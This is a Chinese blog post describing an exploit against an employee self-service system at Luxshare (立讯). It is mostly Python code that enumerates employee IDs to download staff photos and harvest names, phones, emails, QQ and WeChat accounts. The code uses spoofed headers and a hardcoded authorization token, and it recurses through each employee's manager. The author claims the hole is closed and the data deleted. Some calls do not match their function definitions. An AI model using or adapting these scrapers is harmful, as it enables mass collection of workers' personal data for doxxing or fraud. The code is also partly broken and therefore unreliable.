立讯员工自助服务漏洞分析说明

博主： zmx
发布时间：2021 年 04 月 24 日
907 次浏览
暂无评论
5169字数
分类：侵犯 Python

这个exp已经失效最少一年了，所以公开，本文目的是网络安全和隐私泄露问题的相关利用，目前我已经把dump下的数据清空，立讯为什么不回复我的邮件。
</div>

# 获取员工照片信息

<div class="hideContent">该部分仅登录用户可见</div>

返回信息：

> 照片

```python
def get_photo(worker): #获取员工照片入口
    if os.path.exists(worker+".jpg"): # 判断是否已经存储到本地
        return #如果存在，则返回
    print("get_photo:"+worker) # 输出状态
    url = 'https://{url}/upload/emp_photo/'+worker+".jpg" # 获取员工照片API
    headers = {
               'Accept': 'image/webp,image/apng,image/*,*/*;q=0.8',
               'Accept-Encoding': 'ggzip, deflate, br',
               'Accept-Language': 'zh-CN,zh;q=0.9',
               'Cache - Control': 'no - cache',
               'Connection': 'keep-alive',
               "Content-Type": "image/x-icon",
               'Host': '{url}',
               'DNT': '1',
               'Pragma': 'no-cache',
               'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)'
                             ' Chrome/70.0.3538.25 Safari/537.36 Core/1.70.3722.400 QQBrowser/10.5.3739.400',
               'Referer': 'https://{url}/upload/emp_photo/'+worker+".jpg",
    } # 伪造请求头，虽然存在请求头校验，但是伪造可用
    try:
        res = requests.get(url, headers=headers) # 通过get请求下载图片信息
        with open(worker+".jpg", 'wb') as fw: #打开本地文件
            fw.write(res.content) # 写入到本地
    except: # 写入失败时抛异常
        print("====================================")
        print("Photo:"+worker)
        print("====================================")
```

# 获取员工信息

返回信息：

> 信息为json文件，涉及到工号、姓名、所在公司名、岗位、手机号、QQ、微信等隐私信息，且包含直属领导的工号，只需要工号即可查询如下信息。

```json
{
	"IsSuccess":
	"ErrMsg":
	"Token":
	"Data": {
		"Emp": {
			"CompanyCode":
			"CompanyName":
			"DeptCode":
			"DeptName":
			"Code":
			"Name":
			"Gender":
			"Telephone":
			"ExtPhone":
			"ShortNumber":
			"Email":
			"TitleName":
			"DirectBossEmpCode":
			"DirectBossEmpName":
			"Title_En":
			"IsHideContact":
		},
		"IsHideTelephone":
	}
}
```

实现代码以及注释

```python
def get_info(worker):
    url = "https://{url2}/api/AddressList/GetAddressListEmp?language=zh_CN&code=" + worker + "&isFromMine=&empCode=" + worker  # API入口
    headers = {
        'Accept': '*/*',
        'Authorization': 'BasicAuth D88F70FC32F2094FF8B8188E3E3D4F08FB6650808EC28726',
        'Connection': 'close',
        'Origin': 'http://{url2}',
        'Referer': 'http://{url2}/addresslist/employee.html?code=' + worker,
        'Sec-Fetch-Mode': 'cors',
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko)'
                             ' Chrome/70.0.3538.25 Safari/537.36 Core/1.70.3722.400 QQBrowser/10.5.3739.400',

'X-Requested-With': 'XMLHttpRequest',
    } #伪造请求头
    try:
        res = requests.get(url, headers=headers)
        infomation = res.text
        if infomation == '{"IsSuccess":false,"ErrMsg":"没有查询到数据!","Token":null,"Data":{"Emp":null,"IsHideTelephone":false}}' or infomation == '': # 判断是否在岗
            return #查无此人
        strDict = json.loads(infomation) #json 解析
        data = "\'" + str(strDict['Data']['Emp']['CompanyCode']) + '\',' + "\'" + str(strDict['Data']['Emp'][
                                                                                          'CompanyName']) + '\',' + "\'" + str(
            strDict['Data']['Emp']['DeptCode']) + '\',' + "\'" + str(
            strDict['Data']['Emp']['DeptName']) + '\',\'' + str(strDict['Data']['Emp']['Code']) + '\',' + "\'" + str(
            strDict['Data']['Emp']['Name']) + '\',' + "\'" + str(strDict['Data']['Emp'][
                                                                     'Gender']) + '\',' + "\'" + str(
            strDict['Data']['Emp']['Telephone']) + '\',' + "\'" + str(strDict['Data']['Emp'][
                                                                          'ExtPhone']) + '\',' + "\'" + str(
            strDict['Data']['Emp']['ShortNumber']) + '\',' + "\'" + str(strDict['Data']['Emp'][
                                                                            'Email']) + '\',' + "\'" + str(
            strDict['Data']['Emp']['TitleName']) + '\',' + "\'" + str(strDict['Data']['Emp']['QQ']) + '\',\'' + str(
            strDict['Data']['Emp']['WeChat']) + '\',' + "\'" + str(
            strDict['Data']['Emp']['Skype']) + '\',' + "\'" + str(strDict['Data']['Emp'][
                                                                      'SecLevel']) + '\',' + "\'" + str(
            strDict['Data']['Emp']['DirectBossEmpCode']) + '\',' + "\'" + str(strDict['Data']['Emp'][
                                                                                  'DirectBossEmpName']) + '\',' + "\'" + str(
            strDict['Data']['Emp']['Title_En']) + "\'," + "\'" 
        print(data) # 输出获取到的数据
        get_photo(worker, "")  # 获取照片信息
        get_info(str(strDict['Data']['Emp']['DirectBossEmpCode']), "")#获取直属领导信息
    except:  # 写入失败时抛异常
        print("====================================")
        print("info:" + worker)
        print("====================================")
```